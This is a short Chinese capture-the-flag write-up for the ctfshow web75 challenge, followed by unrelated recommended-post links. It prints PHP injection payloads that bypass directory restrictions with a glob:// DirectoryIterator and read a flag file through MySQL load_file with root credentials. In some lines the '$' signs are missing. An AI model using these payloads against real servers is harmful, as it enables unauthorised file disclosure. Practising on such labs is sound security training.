ctfshow web75

icun2024-01-28 19:51

开启环境:

先直接用伪协议获取 flag 位置

c=?><?php a=new DirectoryIterator("glob:///\*"); foreach(a as f) {echo(f->__toString().' ');} exit(0); ?>

c=try {dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach(dbh->query('select load_file("/flag36.txt")') as row){echo(row[0])."|"; }dbh = null;}catch (PDOException e) {echo $e->getMessage();exit(0);}exit(0);

try {

创建 PDO 实例, 连接 MySQL 数据库

$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');

在 MySQL 中,load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。

foreach(dbh-\>query('select load_file("/flag36.txt")') as row) {

echo($row[0])."|";

}

$dbh = null;

}

catch (PDOException $e) {

echo $e->getMessage();exit(0);

}

exit(0);

相关推荐
代码or搬砖8 小时前
String字符串
android·java·开发语言
59803541510 小时前
【java工具类】小数、整数转中文大写
android·java·开发语言
TAEHENGV11 小时前
进度跟踪模块 Cordova 与 OpenHarmony 混合开发实战
android·javascript·数据库
酸菜牛肉汤面11 小时前
6、索引算法有哪些?
android
青春勿语11 小时前
Lumen:重新定义 Android 图片加载体验
android·glide
BrianGriffin11 小时前
asdf 安装的 PHP 上传文件大小限制
开发语言·php
TAEHENGV11 小时前
回收站模块 Cordova 与 OpenHarmony 混合开发实战
android·java·harmonyos
TAEHENGV13 小时前
创建目标模块 Cordova 与 OpenHarmony 混合开发实战
android·java·开发语言
zjw_swun13 小时前
Compose原理简易实现
android·composer
青莲84313 小时前
Kotlin Flow 深度探索与实践指南——中部:实战与应用篇
android·前端
热门推荐
01从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击02GitHub 镜像站点033D 圣诞树网页代码04Linux下V2Ray安装配置指南05UV安装并设置国内源06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07电脑检测软件—图吧工具箱08Gemini3 生成的基于手势控制3D粒子圣诞树09Claude Code Skills 实用使用手册10jdk21下载、安装(Windows、Linux、macOS)